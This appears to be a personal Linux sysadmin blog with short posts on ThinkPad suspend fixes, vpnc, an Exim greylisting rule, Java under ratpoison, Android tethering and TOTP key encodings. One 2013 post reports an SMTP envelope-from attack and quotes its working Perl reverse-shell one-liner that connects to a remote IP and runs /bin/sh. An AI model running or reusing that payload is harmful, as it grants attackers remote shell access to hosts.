Friday, August 16, 2013
Sunday, July 7, 2013
Sunday, May 5, 2013
SMTP: envelope-from address tries to execute perl
earlier today, found this:
(and someone else, too.)
of course, no one wants to execute the downloaded file a.pl:
perl -e 'use Socket;$i="178.218.211.118";$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
not sure which MTA is vulnerable, yet.
...in the meantime i found RedTeam Pentesting GmbH has a detailed advisory on the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here
Monday, April 30, 2012
Ubuntu Precise on Lenovo Thinkpad X200s
starting from an LTS update to ubuntu precise my X200s ended up with:
legacy resume(): pnp_bus_resume +0x0/0x70 returns -19
PM Device 00:0a failed to resume: error -19
tpm_tis 00:0a: 1.2 TPM (device-id 0x1020, rev-id 6)
during suspend.
"blacklist tpm_tis" (itpm=1 did not help because the autodetect did this already...) and using the cgroup-lite package instead of the cgroup-bin helped (cf. https://groups.google.com/d/topic/linux.debian.kernel/kxNcotFXps8/discussion, and https://bugs.launchpad.net/ubuntu/+source/libcgroup/+bug/838729).
continuing here [http://vminko.org/gentoo_manuals/thinkpad_x200#hotkeys] i did
- /not/ require acpi_sleep=s3_bios - quite the opposite: using it broke suspend functionality
- not try i915.modeset=1 video=1280x800
- not look into too many other things (because things seemed to work)
then, adding the dkms version for tp_smapi from here [http://www.thinkwiki.org/wiki/Tp_smapi] so far,
- i am not using the hdapsd but
- do use the Battery charge control features
and installing the power-saving-script-for-pm from here [http://axa-ru.blogspot.com/2009/12/ubuntu-910-thinkpad-x200s-power-saving.html]
- my X200s is doing well with Ubuntu Precise.
(well, of course, i still had to get rid of much foo to be able to start a X session with ratpoison...)
Thursday, March 1, 2012
personal reminder: Cisco vpn and vpnc
a simple task: use a Cisco configuration (for their own vpn client) but use vpnc...
reading up on Cisco's manual - to understand how the config/their client is configured - seemed like a very good idea:
http://www.cisco.com/en/US/docs/security/vpn_client/cisco_vpn_client/vpn_client46/administration/admin.html
unfortunately, i ended with a variant of this
Error: either “to” is duplicate, or “ipid” is a garbage.
which has been reported here:
vpnc-script incorrectly parses the output of ip route with kernels >= 2.6.38
and also found a solution here:
where it boils down to
"an old version of vpnc-script. This script is what sets up all the addresses and routes for you. The OpenConnect project provides an updated / revised release of this script. Download the latest copy from here. Replace the vpnc-script script that comes with the Ubuntu vpnc package: /etc/vpnc/vpnc-script."
Friday, October 14, 2011
combining greylisting with spam scores - working exim example
...personal experience with greylisting, some inspiration (some i can't remember anymore...), and some thoughts led to the following (implemented) idea:
let's suppose you trust the system's spam score to the extent that
- a low enough spam score is fairly-certainly correct
why not use a low enough threshold to have first-time senders pass by?
[/etc/exim4/conf.d/acl/40_exim4-config_check_data.rul]
>defer
> ...
> log_message = message deferred: probable spam and greylistd
> message = Message temporarily deferred
> condition = ${if and \
> {\
> { >{$spam_score_int}{75}}\
> {eq{grey}\
> {${readsocket{/var/run/greylistd/socket}\
> {${mask:$sender_host_address/24} \
> $sender_address \
> $local_part@$domain}\
> {5s}{}{}}\
> }\
> }\
> }\
> }
> delay = 4m
Saturday, July 16, 2011
Sunday, March 6, 2011
personal reminder: ratpoison and an empty, gray java GUI
"How to un-break graphical Java apps under Ratpoison" suggests wmname to make the JVM believe it runs on a different window manager:
$ wmname LG3D
implies the JVM ran on lg3d (Project Looking Glass - a desktop utilizing 3D aspects in the UI), a non-re-parenting window manager written by Sun; this one is on java's hard-coded list of known non-reparenting window managers.
note for OpenJDK: according to this post "versions of OpenJDK that ship with some operating system distributions—at least Debian (and Ubuntu) and Arch Linux in March and August of 2009, respectively—have had this problem fixed by the vendors."
Friday, March 4, 2011
Manually add account to Google Authenticator - Enter key in Base32 Encoding
wanted to use OpenID with Multi-factor authentication as a Single Sign-On (SSO) for online services; in particular, i wanted to combine a regular password with a One-Time Password, namely a TOTP token.
Google Authenticator supports TOTP, and not only for their own 2-step verification but one can "Manually add" other accounts.
The bridging part from TOTP to OpenID, in my case, comes from Clavid (cf. OTP@Clavid).
Now to the tiny bit of information that might save you quite some minutes: when entering your secret key into these two locations to set up an account
- Google Authenticator expects the string to be RFC4648 Base32 encoded
- Clavid expects the string to be hex encoded
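The two encodings side by side, as an added example that is not part of the original post: it converts one secret between the hex form and the RFC 4648 Base32 form, computes the RFC 6238 TOTP code from the raw bytes, and shows what happens when a hex string is typed into a Base32 field. The function names are hypothetical and the key is the RFC 6238 test secret, used here as a constructed sample.

```python
import base64
import binascii
import hashlib
import hmac
import struct

# Constructed sample: the RFC 6238 test secret "12345678901234567890", not a real key.
HEX_KEY = "3132333435363738393031323334353637383930"
B32_KEY = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"

def hex_to_base32(hex_key):
    """Hex form (Clavid side) -> RFC 4648 Base32 form (Google Authenticator side)."""
    return base64.b32encode(bytes.fromhex(hex_key)).decode("ascii")

def base32_to_hex(b32_key):
    """Base32 form -> hex; accepts spaces, lower case and missing '=' padding."""
    cleaned = b32_key.replace(" ", "").upper()
    cleaned += "=" * (-len(cleaned) % 8)
    return base64.b32decode(cleaned).hex()

def totp(raw_key, unix_time, step=30, digits=6):
    """RFC 6238 TOTP (HMAC-SHA1) using the RFC 4226 dynamic truncation."""
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(raw_key, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def hex_typed_into_base32_field(hex_key):
    """Key bytes a Base32 decoder derives from a hex string, or None if it rejects it."""
    try:
        return base64.b32decode(hex_key.upper())
    except binascii.Error:
        return None

if __name__ == "__main__":
    raw = bytes.fromhex(HEX_KEY)
    print("Base32 for the authenticator app:", hex_to_base32(HEX_KEY))
    print("hex for the server side:         ", base32_to_hex(B32_KEY))
    print("TOTP at t=59:", totp(raw, 59))
    # 0, 1, 8 and 9 are not in the Base32 alphabet, so this hex string is rejected ...
    print("hex as Base32:", hex_typed_into_base32_field(HEX_KEY))
    # ... but a hex string made only of 2-7 and a-f decodes silently to a different key.
    print("silent mismatch:", hex_typed_into_base32_field("a2b3c4d5e6f7a2b3").hex())
```

If both sides hold the same raw bytes, the codes agree; a silent mismatch like the last case shows up only as codes that never verify.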
Tuesday, January 4, 2011
personal reminder: rfkill to toggle bluetooth
toggling bluetooth (on a Lenovo ThinkPad X200s / Ubuntu 10.x) via rfkill:
rfkill list
rfkill block 0
rfkill unblock 0
until https://bugs.launchpad.net/ubuntu/karmic/+source/linux/+bug/395358 is fixed...
Wednesday, December 22, 2010
personal reminder: Secure Programming for Linux and Unix HOWTO
not brand-new but not completely outdated:
Sunday, November 28, 2010
Online Tasks Service for Thunderbird/Lightning
Thunderbird/Lightning has been working with Google Calendar for a while now [cf. link]. however, Tasks are not supported as can be seen in this thread and also here.
now, is there another service for Tasks available?
for some time i have been using Chandler but with recent developments TB/Lightning+Chandler stopped working (and they haven't quite figured out who's to blame...).
ironically, Yahoo comes to the rescue: following this post and going further here Tasks with Yahoo actually work.
Friday, October 15, 2010
Reverse Tethering an Android Phone via USB
until recently i was stuck with a stock android 1.6 - and USB tethering was somewhat adventurous (Tetherbot was an option, connectbot another... both worked best, i.e. without restrictions, when there was a VPN tunneled 'over' either of them.)
now, this set-up can also be used the other way around (i.e. use the computer's internet connection the mobile is connected to). however, android's ConnectivityManager does not recognize this connection in such a way that services like Contacts Sync would get going.
startUsingNetworkFeature() in http://android.git.kernel.org/?p=platform/frameworks/base.git;a=blob;f=services/java/com/android/server/ConnectivityService.java will choke on android.net.NetworkInfo.isAvailable():
D/ConnectivityService( 166): getMobileDataEnabled returning true
D/ConnectivityService( 166): special network not available
D/ConnectivityService( 166): getMobileDataEnabled returning true
D/ConnectivityService( 166): special network not available
Tuesday, August 10, 2010
aptitude or apt-get - only update security updates
two quick possibilities to update security updates only (via apt-get and/or aptitude in debian, ubuntu, ...):
- uses a dedicated sources file: http://www.debian-administration.org/articles/241#comment_20
- uses a search pattern: http://ubuntuforums.org/showpost.php?p=9161314&postcount=3
Friday, May 21, 2010
Dell & Linux - Links to Remember
BIOS updates for Dell computers under linux:
The Dell Linux Wiki Page
Dell's info on RAID & Storage (aka. PERC thingthings...)